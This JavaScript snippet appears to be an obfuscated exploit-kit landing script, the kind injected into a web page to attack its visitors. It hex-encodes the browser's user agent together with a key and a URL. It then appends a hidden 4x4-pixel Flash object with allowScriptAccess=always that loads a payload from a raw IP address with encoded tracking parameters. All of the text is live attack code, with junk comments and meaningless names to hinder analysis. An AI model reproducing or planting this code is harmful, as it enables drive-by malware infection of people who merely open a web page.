/*s62501d27360hssfj58556fs*/function hgfgerdfgdf(num, width){/*s81923d14958hfj34417fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s60672d8724hfj99431fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s87850d28480hfj96932fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s28373d53094hfj72098fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd62074hfs*/c += b + d;/*s86458d56283hfj86753fs*/e += 1;}return c;}/*s97275dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.78.226/?NTM3NjM1MjM=&inform=MzI1NjczMTU=&help=money&paper=xH_QMrDYbR3FFYPfKPrEUKREMU3WA0SKwYyZha_VF5yxFDfGpbL1Fx_spV-dCFyEmvJvdLMHIwGh1UfASwR&mail=onYxVBFsT8qj_j0PczhSc1ZbQ_hSOYggX_JCTFbMy2lz1mbBBIcknxheH72BXzustUFgV5ggWnaz7VaOO-w&money=MTAzNjk4OTE=", ghnvbn("http://188.225.78.226/?NzkwNjA3NzU=&paper=xX_QMvWebRXQC53EKvncT6NHMVHRHECL2YydmrHTefjaeVWkzrHFTF_xozKASASG6_JtdfJRDQ&mail=rgjE3WewRkzY9fW10T9fz8jUPWykSeg5GD_xyPYQsTqsOUFLA-2VvyzbMkcc8mwRWC61ENjOge&help=money&inform=Mzc2NDkwNzA=&work=NTEyNzEzNzQ=","wexykukusw"));